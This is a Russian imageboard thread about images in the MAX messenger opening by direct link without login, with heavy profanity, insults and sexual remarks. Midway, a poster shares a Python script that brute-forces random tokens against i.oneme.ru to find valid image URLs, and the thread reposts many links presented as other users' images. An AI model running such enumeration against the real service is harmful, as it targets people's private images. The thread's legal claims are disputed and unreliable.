Я просто не понимаю зачем так делать. Почему такой хуйни у других соц сетей и мессенджеров нет?
бамп
Так в ВК тоже самое. С подключением. Многие его юзкют, как бесплатную файлопомоку ради этого и обмена прочими не потребствами.
это враги родины саботируют проект изнутри, в гнусном страхе перед грядущим железным занавесом 2.0 и чебурашкой
Да, твоя ссылка работает.
Чел это есть абсолютно во всех мессенджерах. Пока ты ссылку никому не дал ее никто не подберёт.
Бля, неверю. Можешь показать что там? Вроде борда 18+, но можешь часть фотки замазать.
Ну возьми сам и открой во вкладке инкогнито, дебил залётный.
тетька с грудью и микрофоном с цифрой 6 на твоей ссылке.
шел 2026, отечественные биг-простигосподи-техи так и не смогли в авторизацию и rbac
Получается это бесплатный CDN, лол. Но я не понимаю почему так они запрограммировали.
Бтв, выглядит как нейронка. Дважды дебил, если платишь за такое.
чел, как бы тебе сказать. Я у себя все проверил и просто ахуел что так работает. АХУЕЛ АХУЕЛ. Мне показалось, может я где-то авторизоваться успел или какой-то кэше поднят. Бля, просто в ахуе что другой человек по ссылке это видит.
Получается что товарищь майор так же ходит, все забирает и не спрашивает разрешения.
Ну это Кристина Финк, олдушка. Она сама из себя бимбо унитаз сделала. Я не то чтобы симп, но мне по приколу ей закидывать 1200 рублей каждый месяц. Там в ВэКа и похуже симпы есть, без меня денежный поток формируется. Я просто смотрю в бездну и надеюсь она как БОГДАНОВ станет или как ИВЛЕЕВА, так и развлекаюсь.
Ну и шишка на такие унитазы стоит.
Нухуя чел. В телеге на страницу с авторизацией бросает.
Все, уже весь контент сохраняют челики в вебархиве
https://web.archive.org/web//https://i.oneme.ru/i
https://i.oneme.ru/i?fn=sqr_96&r=BUFxtygYfQ8hp8NJRyp5v4T3ewWf33F1LrHgLAviU7Xjwaw2UFdjhaVRWdovUAfMLVH-JkouWiYVlLjk6xhIvIXQ
https://web.archive.org/web//https://i.oneme.ru/i
https://i.oneme.ru/i?fn=sqr_96&r=BUFxtygYfQ8hp8NJRyp5v4T3ewWf33F1LrHgLAviU7Xjwaw2UFdjhaVRWdovUAfMLVH-JkouWiYVlLjk6xhIvIXQ
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2NotLyFg8dA3YuYE-Jcr4z4SwCI5zi59XKJ57E_tvVh_vXQ
https://i.oneme.ru/i?fn=w_1440&r=BUFxtygYfQ8hp8NJRyp5v4T3JUIf-u1VmS9XiUOwe734iw5nXcsFf0bqcooR_I6J6TLFHytuSFeq8nVn8TsBai5o
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not-kU-5WS4U--IZjFV6eFA3zNxdjZ5-leNYpYIwQyBtC8
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not1-0z8g3pZYrqI08nC67qWzODAxq_tQoPZksJpvUSYtA
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not18L7i0xVwuF-IIfyvMvkETODAxq_tQoPZksJpvUSYtA
https://i.oneme.ru/i?fn=w_1440&r=BUFxtygYfQ8hp8NJRyp5v4T3JUIf-u1VmS9XiUOwe734iw5nXcsFf0bqcooR_I6J6TLFHytuSFeq8nVn8TsBai5o
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not-kU-5WS4U--IZjFV6eFA3zNxdjZ5-leNYpYIwQyBtC8
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not1-0z8g3pZYrqI08nC67qWzODAxq_tQoPZksJpvUSYtA
https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not18L7i0xVwuF-IIfyvMvkETODAxq_tQoPZksJpvUSYtA
> мне по приколу ей закидывать 1200 рублей каждый месяц.
Ебать ты ничтожное уёбище просто. И как такие безмозглые симпы на двач попадают....
Ты хотел написать в аутентификацию же, правда?
Чел, одно дело когда ты делаешь конкурентный продукт, который должен быть настолько охенен, что люди сами в него придут.
А другое, когда тебе сверху спустили распоряжение, дали денег и всех похуй на результаты, потому что тупо всех заставят пользоваться этой поебенью.
Ну и как бы ты делал во втором случае? Да наклепал бы там какой-то хуеты на отъебись, программируя все по охуительным советам гигачата, лол. Еще сидел бы и проигрывал, что твою хуету навязывают каждому россеянину. Никто там и не пытается делать хорошо. Всем похуй. Там никогда не будет ничего хорошо. Это будет типичные государственный продукт - максимально кривой и неудобный. И никто никогда не будет в нем ничего исправлять.
Нарушение трудовых/образовательных прав. Ни трудовой договор, ни образовательная программа не могут содержать пункт об обязательной установке конкретного мессенджера.
Требование об установке мессенджера MAX без вашего согласия - неправомерно. Действуйте уверенно, ссылайтесь на нормы права и отстаивайте свои границы.
Главное - самим научиться сразу же снимать на видео в смартфоне любые попытки такого беспредела в отношении вас и других людей. "А теперь то же самое повтори под запись!" - так я начинаю съемку всегда и везде, где меня пытаются обмануть или что-либо навязать: банки, магазины, дырявые ментовские забегаловки и т.д.
Правовая основа:
Согласно ст. 23 Конституции РФ, каждый имеет право на неприкосновенность частной жизни, личную и семейную тайну, защиту своей чести и доброго имени. Смартфон — личное имущество, содержащее персональные данные владельца.
Ключевые законодательные нормы:
Ст. 209 ГК РФ закрепляет право собственника свободно владеть, пользоваться и распоряжаться своим имуществом.
Федеральный закон «О персональных данных» (№?152?ФЗ) требует добровольного согласия на обработку персональных данных. Установка приложения подразумевает доступ к контактам, медиафайлам и другим данным.
Трудовой кодекс РФ (ст. 60) запрещает требовать от работника действий, не предусмотренных трудовым договором.
Закон «Об образовании в РФ» (ст. 44) не возлагает на учащихся обязанность использовать конкретные мессенджеры.
Почему требование установить MAX незаконно
Отсутствие добровольного согласия. Установка приложения — акт волеизъявления. Никто не вправе принуждать вас к этому.
Доступ к личным данным. Мессенджер получает доступ к контактам, галерее, микрофону, камере и другим функциям. Это возможно только с вашего явного согласия.
>oneme
Опять это ебанное онеме повсюду.
Не так давно прививки тоже было делать необязательно. Ну только пойдешь нахуй в неоплачиваемый отпуск.
Почему тогда госуслуги сделали удобно, круто и полезный сервис?
Ну понятно, если тян сама из себя сделала учёную там, архитекторшу, платы паяет, пластилиновые мульты делает - ей хуй. Если тян из себя бимбо-унитаза сделала, ей платим.
Это тебе только кажется, что они удобные. Там масса крайне херово проработанных разделов.
Ты просто не видел госуслуги, если бы их делали компании, которым нужно заманивать в свой сервис людей. Тогда бы ты охуел, какое сейчас перед тобой кривое, нефункциональное говно.
>oneme
О дивный клоунский мир
О дивный клоунский мир
а самому купить шприцы, наполнить их грязной водой или просто пустые и колоть всех этих требующих блядей не? А, ну ты же ссышь сопротивляться фашистскому режиму...
Таблетки прими.
>госуслуги сделали удобно
Ебанутый? Постоянно отваливается логин, с просьбой зайти через лох айди, плохо работает на пк, говно короче.
ссышь...
Ну в рот тебе ссу, да. А что?
Закрыл такую дыру на этапе проверки своего проекта после реализации его через ai. Мало того что авторизацию проверять надо, так ещё и права доступа. Все это на этапе мануальных тестов на локалке. Видимо я умнее чем вся команда Макса, мдя.
Я просто богатый очень, не завидуй.
Авторизация - это и есть проверка прав доступа, ебануться ну что за программисты
ох ты ж ссыкло ебаное.... обколотое... в трусах на голове.... сколько ж мы таких отпиздили в то время....
Дежурно амоминаю базу.
Таблетки, чел.
Концентрировано.
Нихуя. Авторизация - вход на платформу. Права доступа - права обладания/просмотра/редактирования объектов. Чтоб Вася не мог смотреть файл Пети, если не имеет на этого разрешения.
Подсвинки все не унимаются, ебанек, у тебя "ПО ССЫЛКЕ" отправляется гет запрос, в параметрах которого указан токен, токен - генерируется уникальный для каждой картинки и без знания алгоритма (а плюсом всех сопутствующих данных, используемых при шифровании) - ты в жизни не сможешь подобрать ссылку. Хрюкающие подсвинки с шакальными пикчами пытаются выехать на некомпетентности дурачков вроде оп-а
Ты путаешь с аутентификации (идентификацией)
Какое слово проще написать, то и пишу. А вообще ты прав, даже хэлпер authenticate_user! называется но прописывается всего 1 раз, дальше наследуется
вы чет все ебанаты
аутентификация - процесс распознавания клиента (вы кто такие?)
авторизация - процесс разрешения/запрета доступа к ресурсу (идите нахуй)
все
-кун
Что это за картинки? Запилили уже генерптор ссылок?
В прошлом анон выкатил брутфорсер, но макаба съела пробелы, надо форматировать и тестить. играйтесь, перебирайте)
import asyncio, aiohttp, random, string
alphabet = string.ascii_letters + string.digits + "_-"
found = 0
checked = 0
lock = asyncio.Lock()
async def worker(session):
global found, checked
while True:
if found >= 5:
return
code = ''.join(random.choices(alphabet, k=43))
url = f"https://i.oneme.ru/i?r={code}"
try:
async with session.get(url) as r:
async with lock:
checked += 1
if checked % 1000 == 0:
print(f"перебрано {checked}, найдено {found}")
if r.status != 400:
print(url, "\n")
with open("found.txt", "a") as f:
f.write(url + "\n")
found += 1
if found >= 5:
return
except:
pass
async def main():
connector = aiohttp.TCPConnector(limit=1000)
async with aiohttp.ClientSession(connector=connector) as session:
tasks = [worker(session) for _ in range(200)]
await asyncio.gather(*tasks)
asyncio.run(main())
Ну давай поясню для детсадовца. Это вообще выглядит ни как баг, а как фича для заинтересованных лиц. Вот схематоз.
@@@@
СКАЧИВАЕШЬ ЯНДЕКС БРАУЗЕР
@@@@
ЗАХОДИШЬ В МЕССЕНДЖЕР МАКС
@@@@
БРАУЗЕР ИНДЕКСИРУЕТ ВСЕ ТВОИ ССЫЛОЧКИ НА КАРТИНКИ (УПС БАГ НЕ НАШЛИ ЯНДЕКСОИДЫ)
@@@@
ПОТОМ ПАПОЧКИ ОТПРАВЛЯЮТСЯ НА СТОЛ К ТОВАРИЩУ МАЙОРУ
@@@@
МАЙОР СКРОЛИТ 24/7, УРЧИТ, НИКОГО НЕ ТРЕВОЖИТ
@@@@
ФОРМАЛЬНИО НИ VK, НИ ЯНДЕКС НИЧЕГО НИКОМУ НЕ СЛИВАЛИ. ЭТО ОСОБЕННОСТИ ИМПЛЕМЕНТАЦИИ.
@@@@
КОГДА НИБУДЬ ПРОПАТЧИМ
Кстати, GET запрос даже провайдер видет. А у него логи есть. Так что думай!
>Подсвинки
Ага, да. Два дежурных и все остальные аноны подсвинки.
Какой нахуй баг, ты о чем вообще, болезненный? Это вполне современный метод авторизации для доступа к медиа, который тупо проще и используется дохуя где в т.ч. в дискорде, например.
Устойчивость к взлому более чем достаточная чтобы никто даже не стал с этим связываться. А все ваши свинячьи вскукареки рушатся просто от того, что если злоумышленник и так имеет доступ к аккаунту/браузеру/пука/телефону/провайдеру/твоему очку - ему вообще похую чем ты там пользуешься, дурачок.
>если ты удалишь свое сообщение, то само фото не удалиться
Пориги открывают для себя интернет.
только домен
Хыхыхы. А гитхаб даёт сделать собственный сайт ещё? Скрипт выглядит супер легким, можно для анонов замутить приколюшку пока не пофиксили
В телеге и других мессенджерах так же хранятся файлы, в чем проблема? Подбирать бесполезно же, это криптографический ключ.
У майора и так прямой доступ ко всем фоткам в том числе в личных чатах, смысл ему так изьебываться?
> СКАЧИВАЕШЬ ЯНДЕКС БРАУЗЕР
> @@@@
> ЗАХОДИШЬ В МЕССЕНДЖЕР МАКС
Нахуя?
Каждый файл имеет абсолютно рандомный ключ?
Ключ никак паттерном каким-нибудь не привязан к акку?
Пять тысяч отборных солдат и раком!
А у хохлов есть такое?
Ципсошный псиоп разгоняют. Шакальные картинки, вбросы касательно якобы существующих брутфорсеров, какой-то список ссылок хуй пойми как полученных и перекрытие щитпостом любых неудобных постов. Прям все по методичке.
как я испорльзую вк- в личку трупам кидаешь вебмы фотки чтоб память не захламлять. и оно там бесконечно хранить. личка трупов это бесконечный жесткий диск.
трупов найде в местных подслушано. в новостях с трагедиями
трупов найде в местных подслушано. в новостях с трагедиями
Добавляешь &fn=w_1440 в конец любого URL из списка и ДОВОЛЬСТВУЕШЬСЯ
> Это невероятный вид тролинга?
ВК так же работал. Можно было как хостинг картинок использовать.
>Бля, просто в ахуе что другой человек по ссылке это видит.
Лул, а как ты думаешь наполняются ресурсы, типа фапелло? Они просто агреггатором собирают ссылки со шлюзов и всё.
Вот, прошел по твоей ссылке, там еще аргумент можно попробовать не 640х960, а 2к выбрать, и можно искать хайрезы, если они в той же директории находятся.
Чтобы показать бумерам что якобы у них такого доступа нет.
https://i.oneme.ru/i?r=BTEFHNxXjmuR0N2Fir9SuMMRCpdB3b9Y2qxUYV2lTUlHnq-O5qxacvfOZSHRk91-7yg
https://i.oneme.ru/i?r=BTEFHNxXjmuR0N2Fir9SuMMReDoT-dRFE65vFHKx7sG-uK-O5qxacvfOZSHRk91-7yg
https://i.oneme.ru/i?r=BTEFHNxXjmuR0N2Fir9SuMMREiephXMCNFDrIysLyE-eI6-O5qxacvfOZSHRk91-7yg
https://i.oneme.ru/i?r=BTEFHNxXjmuR0N2Fir9SuMMReuqIL9gDALS5PO-e6K14QK-O5qxacvfOZSHRk91-7yg
часть урла только меняется.
алгоритм говно, кстати, можно высчитать функция преобразования в хеш
Если внутри:
HMAC(user_id + file_id + secret):
то без секрета сервера предсказать валидную строку нельзя. Потому что перебор будет 2^128 или больше.
Я тоже сейчас свои ссылки на файлы заскриню и выдам за результаты парсинга.
Нахуя мне это делать, если я не могу удостовериться что этот список реально кто-то забрутфорсил, а не спарсили из своих же каналов/переписок? Ну ахуеть пруфы, пишу бота который рандом кал с радикала будет через макс отсылать мыколе в соседний окоп и тут же постить ссылки, вот это взлом, хохлы на острие науки!
МОН САФИР САПЛИСУР
Вот вам и мессенджер SCUMmaxed
ДА ЭТО ОНЕМЕ КОКОЕТО!
ХУНТАi !!!111
закидывай мне тоже, я за тебя молиться буду
Просто, запретить надо ето ониме.
Привет, борд. Чето я в ахуе от поедания говна. Оказывается все какашки, которые ты съедаешь, тупо во рту размазываются и налипают на зубы узором странным. Самый рофл еще в том, что если ты кому-то отсосал, говно выложилось на его хуй по странному правилу и если ты удалишь свое говно, то сама вонь от него не удалиться.
Блять, это какой-то пиздец на уровне СЮРА, я вообще без понятия что там за мегаразум такое запрограммировал. Вешаешь хедер авторизации хотябы бейсик, чтобы токо ты и те у кого доступ есть могли такое смотреть.
Это невероятный вид тролинга?
наМАХнем!
в рамках одного пользователя меняется только 20 символов внутри урла.
т.е. если вам нужно слить картинки кого-то конкретного пользователя это сделать очень даже можно и не особо то и долго. если ботоферму использоваться так вообще вопрос несколько дней/часов.
Двадцать символов рандома в середине, если считать что используется [A-Za-z0-9] и "-" то это даёт число всех возможных вариантов (26+26+10+1)^20>2^119, нужный ты никогда не подберешь.
СВИНИ РОЗГОНЯЮТ!
ХАХЛЫ!
ОНЕМЕ РУЛЕТ!
МАХ-МАХ
ПОРКОВКА!
ХАХЛЫ!
ОНЕМЕ РУЛЕТ!
МАХ-МАХ
ПОРКОВКА!
поверь мне брат
Так вроде тот же самый алгоритм у ВК сейчас, урлы доступны без авторизации. Вероятно один и тот же бэкенд, тот же PHP
Да это известный прикол ВК, у них с самого начала фото статикой загружались просто на рандомные CDN серваки, в том числе в приватных переписках и закрытых группах, и ничто не мешало так или иначе просто взять и раздавать затем ссылку на картинку вида https://fgsfds265.vk.com/pnhthx/xcqkgbfsb666_640.jpg - и она будет жива перманентно, даже если группа уже 15 лет, как удалена или альбомы закрыты. И наоборот, находил моменты, если сервак отрыгнул, то древние картинки года этак 2009 теряются и не грузятся никак
>какой-то список ссылок хуй пойми как полученных
>Я тоже сейчас свои ссылки на файлы заскриню и выдам за результаты парсинга.
Хоть ссы в глаза - всё божья роса. Пока сам минцифры в треде кружочек не запишет - будут копротивляться.
>Я тоже сейчас свои ссылки на файлы заскриню и выдам за результаты парсинга.
Хоть ссы в глаза - всё божья роса. Пока сам минцифры в треде кружочек не запишет - будут копротивляться.
Лол хакеры взломают сервер и узнают секрет.
>сам минцифры
Типа полизал немного? Когда инет доломают, куда языком работать пойдешь, лахч? На заводик не смогешь, остается только копротивляться домашней и внешней наташкам.
ЛОЛ БЛЯТЬ
Это ведь только из групп всяких и каналов фотки? ЛИЧНЫЕ ТО БЛЯТЬ ШИФРУЮТСЯ КАК-то И НИКТО КРОМЕ ЮЗЕРОВ ДОСТУПА НЕ ИМЕЕТ???
Так ведь?
на само деле это все хуита, если у тебя есть доступ к генератору урлов (т.е. если ты можешь писать в чат и смотреть итоговый урл) то функция хеша реверсинжинирится. это геморрройно и требует больших мощностей но вполне реально.
Я думаю там оплачивают один раз и сливают. Если бы эту ссылку токо я видел - то окей, но то что любой васян ее потенциально в инете видит кринж.
прикинь ты хуй кому-то отсослал свой, даже если ты удалишь сообщение, если удалишь аккаунт, то ВэКа его с сервера не уберет :). А умники еще и в вебархив кинут. Ну и потом можно даже на бутылку сесть (наверное).
===========
Я то хотел с Телеграмма на ВК/Макс переходить и чат избранное использовать для сохраненок. Но сейчас почему-то неуверен. Не хочу чтобы сохраненки торчали в инет.
В косплее когтя смерти? Это реально полноценный косплей или нацепила рога и вывалила сиськи как тупая шлюха без фантазии?
Пока ты сам из своей сессии не вытащишь ссылку, я не увижу файлы.
>наверное
Наверняка и обязательно.
В остальном верно.
а если в урле фигурирует логин/телефон пользователя и он хешируется тем же алгоритмом (а судя по виду урла начальные символы в нем - это оно и есть) то это вообще пизда и задача становится почти тривиальной
А это тогда что
А туда ли ты воюешь? Ты же неправильно распарсил тональность сообщения. Чтобы не было разночтений - минцифры я хотел бы видеть там же, где и РКН.
Я тут пару групп в VK создавал для затестов. И я тебе скажу так... Функционала удалить группу в VK нет. Прикинь? Единственное что можно сделать это выкинуть оттуда всех, удалить контент и выйти самому. Поэтому неудивлен что НИЧЕГО ИЗ ВЭКА НЕ УДАЛЯЮТ.
> то ВэКа его с сервера не уберет
Именно поэтому и чистят всякие архивачи, и жвачи, выдавая за поломки дисковых пространств. У таких файлов нет функции таймкиллинга. Все фотки быдла в ЦОДах хранятся вечно, даже если ты сдох давно.
добрый бот сломался
Скотоублюдок, Спок.
Это парсинг посещенных ресурсов, возможно, компании людей.
Может выпить синию таблетку и не думать о последствиях? Просто лить в VK Мессенджере все в сохраненки.
Типо я зря трясусь и все такое.
Ага, тоже помню, искал инфу по давно удаленной странице по id, и на каком-то из сайтов-парсеров страниц ВК были сохранены ссылки на все юзерпики и фото из публичных альбомов за всю историю страницы, все они по прямой ссылке открывались в полном размере по вот подобным адресам
>Я вот подписан на платную группу Кристины Финк, где плачу ей каждый месяц денюшку.
Блять какое же ты жалкое чмо, пиздец, лмао
Главное не лить противозаконную или потенциально противозаконную зуйню
Мань, всё делается намного проще
"Что что, Пердикс Сычев, не хотите мах установить?
Хмм, ну штош, можете не устанавливать. Но внутри нашей организации мы прекращаем обмен информацией через любые другие мессенджеры.
a few days later
А почему вы не выполнили задачу? Ах, у вас не установлен мах? Очень жаль. Видимо, премии в этом месяце вам не видать. Что что? Куда нам пройти? А, понятно. Приятно было поработать, всего хорошего на новом месте работы "
С учениками, студентами и их родителями та же схема. Не хочешь? Не устанавливай. Но где и как вы будете брать инфу про расписание, мероприятия и прочее куратора/классрука уже не ебет. Неделю - другую покривлятются, и как миленькие переходят
>противозаконную или потенциально противозаконную хуйню
То-есть - любую.
Вот эти ссылки из личных чатов. Там в URL патерн формирования даже есть. Так что жопой не виляй, все там сливается.
Рандомные фотки из интернета. А ты думал?
На самом деле, инструментарий скрыт. Если у тебя есть доступ к администрированию групп, не тому, что доступен публично, а чуть выше по иерархии, ты можешь кликом скрыть группы или реально удалить их с удалением связанных файлов. Только кто ж тебе его даст - компромат удалять?
Если бы за любую хуйню притягивали, я бы тут с тобой сейчас не переписывался. Ну и скрин у тебя с говносайта какого-то
Порктивозачатошному
Скотоублюдок,прививки против вируса гриппа бесполезны. ты обкололся говном, мразь
HOBOSTI (Хобости, в Интернете — Hobosti Russia, на ТВ — 2x2 Hobosti) — сатирико-юмористическая и информационная передача российского телеканала «2x2», пародия на новости.
КЖХДПП
>4
Задумка конечно правильная, но реализованная через жопу как обычно. Именно по этому нужно создать своё приложение, которое бы могло собирать данные на граждан РФ и не только и передавать их прямиком в нашу церковь. Да и вообще, по хорошему mail.ru должна отдать двачи нам, мы бы уже давно навели тут порядок
в дискорде также, в чем причина баха
> Чел это есть абсолютно во всех мессенджерах. Пока ты ссылку никому не дал ее никто не подберёт.
ты хэш на 100 символов подбирать собрался? взломщик пентагона, ты?
> Чел это есть абсолютно во всех мессенджерах. Пока ты ссылку никому не дал ее никто не подберёт.
ты хэш на 100 символов подбирать собрался? взломщик пентагона, ты?
>Если бы за любую хуйню притягивали
>потенциально
Потенциально за любую и притягивают.
>скрин у тебя с говносайта
Like I said - если не от Главнюка - несчитово.
>пародия на новости
Тащемта результаты работы экстремистской организации ГосДума - это сплошные пародии на новости.
С таким же успехом можно просто биткоины искать, толку больше будет.
Прощелкал пару адресов, а там это.
Прощелкал пару адресов, а там это.
Нейронка + 100 ретуши + силиконовые сиськи
Долбоебы типа ОП-а пидоры готовы донатить за это пол зарплаты безтолковой шлюхе, лмао
Почему товарищ майор не берет таких хуесосок на карандаш по очевидным статьям - "изготовление и публичное распространение порнографии", а вместо них сажает блогерок, которые сделали рекламную интеграцию в ютубе с проетиновыми батончиками вопрос большой
Ну так дрискорд кал без самого простого шифрования и не позиционирует себя как БЕЗОПАСНЫЙ НАЦИОНАЛЬНЫЙ МЕССЕНДЖЕР с привязкой к госуслугам.
Ясно. Продолжайте наблюдение.
> должна отдать двачи нам
"Нам" это кто?
Как же подсвинки разгоняют. Казалось бы, при чем тут фрагментирование? Наверное це очередная москальска лженаука!
Это наследие сайтов на базе PHP из ранних нулевых.
Попробуй на каком-нибудь говнофоруме тех лет удалить аккаунт.
Ну вот оп хуй скинул ссылку: https://i.oneme.ru/i?r=BTE2sh_eZW7g8kugOdIm2Not18L7i0xVwuF-IIfyvMvkETODAxq_tQoPZksJpvUSYtA
И мне блять че, нужно подбирать символы рандомно, чтобы попасть на новую картинку? Так это же тупо невозможно. Поменял случайные буквы а мне в ответ 400
И мне блять че, нужно подбирать символы рандомно, чтобы попасть на новую картинку? Так это же тупо невозможно. Поменял случайные буквы а мне в ответ 400
Напомни, а с чего это ты решил, что этот способ менее безопасен чем какой-то другой?
Церкви Азуло-веры, разумеется. Кстати, вступай к нам, будем вместе трудиться во благо принцессы
Это машина может сделать методом перебора.
Потому что проще наращивать дисковые массивы, чем бороться с фрагментированием.
Раз в 100 лет выдавать по одной картинке случайного содержания?
https://i.oneme.ru/i?r=BTFjO43w8Yr1OSJ4tcurq5HilXG9QMF8Si4Fs2fptZg80_y4ePJqkr65xxKnGpLOYvo
Ну вот прямо сейчас в мессенджере чмакс закинул фотку как даю на ротан няшной альтушке. Жду когда меня сольют и пришлют ссылку. Удачи
Кстати, по поводу нейронок.
На многих сливных сайтах уже куча нейроконтента от самих онлифанщиц, то есть им уже даже хуй ёбаря не надо светить, просто нейроночкой дорисовывают. Не удивлюсь, если некоторые уже и сиську письку перестали показывать, а просто рисуют нейронкой.
На многих сливных сайтах уже куча нейроконтента от самих онлифанщиц, то есть им уже даже хуй ёбаря не надо светить, просто нейроночкой дорисовывают. Не удивлюсь, если некоторые уже и сиську письку перестали показывать, а просто рисуют нейронкой.
Лет так через 1000 да, может, набрутфорсишь аватарки пабликов и тонну шлакового говнища.
Эксперты так написали!
Ебанько,у ВК эту хуйню обнаружили года 3 назад
Обнаружили на дваче,сколько ею пользовался Анон неизвестно
ПОЛЬЗОВАТЕЛЬ ПИКАБУ НАШЕЛ
ПОЛЬЗОВАТЕЛЬ ПИКАБУ ВЫЧИСЛИЛ
ПОЛЬЗОВАТЕЛЬ ПИКАБУ НАКАЗАЛ ЗЛОУМЫШЛЕННИКА
А помните когда двачеры были такими? Давным давно, пока Абу не начал рекламировать Двач всяким залётышам в Вкалтакте
Вот кто пришел на Двач, кликнув по ссылке в Вконтакте. Узнали? Это ОП-пидор.
Пользователи двач сегодня 600 постов треда не смогли вычислить ректора БАУманки имея на руках имя и мафилию.
Пидор для себя оставлял,а ты платишь ссучка терпильная
Представь,если бы ето не починили лет десять,сколько бы забавного контента накопилось
так дело даже не в калтакте, который мёртв
щас тут 90% контингента либо по чатикам, типа лесополосы, либо творожные омежки рнн с пенсией и без каких-либо скилов и интересов, кроме как ныть на двощике, что писька сама на хуй не прыгает.
Эта "машина", она сейчас с тобой, в твоей комнате?
Если да, почему ты ещё не приспособил её для вскрытия каких-нибудь кошельков Биткойна в которых завалялось хотя бы 100+ битков? Сложность перебора-то сравнимая.
Двачую.
Кто-то решил свой говноброс, нахуй никому тут не интересный, закинуть на двачи
>Эта "машина", она сейчас с тобой, в твоей комнате?
Даун блять. Машина - любая локальная нейронка для поиска. Все что тебе потребуется это Ryzen 7, 16 гигов оперативы и RTX 4060
Двачую.
Настоящий анон извлек бы лулзы.
А терпильная пикабуха-пидораха спалила все
И за столько лет компьютер саентисты не придумали базу данных из которой можно будет удалять файлы и не иметь фрагментации?
Тебя не смущает, что там у них все на базе PHP до сих пор?
> внутри нашей организации мы прекращаем обмен информацией через любые другие мессенджеры.
На основании? Где распоряжение обязательного использования в коммерческой организации публичного мессенджера? Где договор с отказом от ответственности за разглашение информации в случае утечек?
Да хоть голубиной почтой общайтесь, работа руководителя удостовериться в постановке задач и контроле результата, если кто-то пошёл в сортир пёрнуть, я об этом тоже не обязан знать.
Пока жива корпоративная почта-ебитесь в рты.
Нет не придумали. Такую хуйню можно исполнять только в относительно небольших системах, где получится целиком базы обрабатывать и делать дефрагментацию. офк для действительно крупных порталов с тонной медиа - это все равно что себе по коленям стрелять.
Подбор случайной последовательности из 15 символов методом полного перебора требует огромного времени из-за экспоненциального роста комбинаций.
Расчёт времени
Для алфавита из 62 символов (a-z, A-Z, 0-9) общее число вариантов: 62^{15} \approx 7.05 \times 10^{26}.
При скорости 10^9 проверок/сек (мощный ПК):
Время: 7.05 \times 10^{17} сек ≈ 22 миллиона лет.
С GPU-фермой (10^{12}/сек): около 22 тысяч лет.
С миллиардом устройств: всё равно сотни лет.
Думаю если ты работаешь в залупе, где для корпоративной связи используется ЛЮБОЙ мессенджер - то установка макса, явно не первоочередная проблема.
> ЯНДЕКС БРАУЗЕР
> МЕССЕНДЖЕР МАКС
> VK
Блять, я чуть прямо на свой синкпад не блеванул. Фублять, фунахуй
Сюда смотри дурачок ----> [картинка_для_дурачка.jpg]
тебе не нужен другой чел, чтобы проверить доступность этой ссылки
открываешь браузер в режиме инкогнито - это то же самое, что другой чел зашел на новый пк и новый браузер
И что ты мне хотел этим сказать? Тебе говорят про сбор всей базы, а не точечного определения. Вайбэк Машин сделал сбор базы, а потом уже нейронка с машинным зрением отфильтрует по полкам всё что тебя интересует.
Меня больше веселит тот факт, что эти уебаи в спешке внедрения этого МАХА по локоть в анус степахам придумали ПОДПИСЫВАТЬ ДОКУМЕНТЫ ЧЕРЕЗ БОТА В МАКСЕ И ГОСКЛЮЧ.
То есть оцените - ты кидаешь боту в максе документ, который должен быть подписан цифровой подписью, а это вам не картиночка с показаниями счетчика, а наверняка серьезный документ, раз его требуется подписывать госключом. Документ сохраняется в недрах этого макса с постоянной ссылкой и отправляется тебе в госключ, а остальные при умении могут видеть твои конфиденциальные доки.
Охуенно придумано, 100/10.
Сейчас вроде бота приглушили, видимо дошло до болезных, в чем тут мякоть.
> Сейчас вроде бота приглушили
Все работает.
>Сейчас вроде бота приглушили, видимо дошло до болезных, в чем тут мякоть.
Всмысле? Отключили его? Можно подписывать госключчем?
Алсо, документы в моей конторе подписываются в специальном корпоративном мессенджере (это второй вид мессенджеров после публичных)
> наверняка серьезный документ, раз его требуется подписывать госключом
Да, например вот.
> 600x829
)))
Хотя скорее будут выглядеть вот так. Подпись-то электронная.
А, гу можнт быть врубили снова. Мне надо было одну бумажку подписать так, и я охуел с метода.
То есть либо нотариусом за плату, либо вот такими костылями через макс
>Ст. 23 Конституции
Не регулирует установку приложений напрямую. Это общее право приватности.
>Ст. 209 ГК
Да, телефон, - это твое имущество. Но это не означает, что организация не может устанавливать правила коммуникации.
>Федеральный закон «О персональных данных»
Обработка персональных данных требует согласия, но сам факт установки мессенджера не является обработкой персональных данных организацией.
>Трудовой кодекс РФ (ст. 60)
Cпособ коммуникации, обычно, рассматривается как организация работы, а не как трудовая обязанность, которая, не установлена в договоре.
>Закон «Об образовании в РФ» (ст. 44)
Есть еще статья 28 "Компетенция, права, обязанности и ответственность образовательной организации". Хотя тут пожалуй суд встанет на сторону учащегося т.к. требование установить мессенджер без альтернативы, для просмотра к примеру оценок, является лишением доступа к образованию.
Вот будем потом над твоим документом о расторжении брака всем двчем угарать,
Куратор разрешил лишние 500кб трафика потратить? Я, конечно, понимаю что вы там особым умом не отличаетесь, но попробуйте лить документы без вотермарок и хоть немного свежего года. Прям вижу как кому то СРОЧНО потребовалось переслать через макс шакальный договор с отзовика, или дкп 10-летней давности, от проданной за 4 года до создания макса машины.
Пиздец, ведь реально льют рандомные пикчи и пытаются выдать это за великий взлом, ахуеть просто.
Против других мессенджеров не работает 24/7 вся свинявая ботоферма с целью дискредитации. И я даже не хочу разбираться что ты там вбросил, бесплатный окатыш
Ты шиз? Я эти документы буквально в гугле по запросу нашел, не нужно никаких сливов, люди их сами выкладывают.
Не, я на ебучем рег ру подтверждал корпоративные домены, которые были зарегистрированы на руководителя как на физлицо.
Чтобы их передать и вообще делать какие-то действия, регру нужны подписанные заявления, заверенные этой дурью, госключ плюс макс.
При этом имеется укэп стандартная, с криптопро, но хуй вам, а не подпись, сливайте все в макс.
Крч пошел руководитель заверять через нотариуса, ибо тоже охуел с принципов подписания.
Люди ли? Мне кажется до звания людей им надо пройти пару ступеней эволюции.
ВАУ НИХУЯ СЕБЕ ПРЯМО КАК В ИНСТАГРАМЕ!!!
а не, подождите, ЭТО ДРУГОЕ!
ну все правильно сделали, шобы тарищ майор мог просматривать, а хули ты хотел?
Так хохлов в максе нет. Это же главная фича о которой из всех щелей трубили.
ну все правильно сделали, шобы тарищ майор мог просматривать, а хули ты хотел?
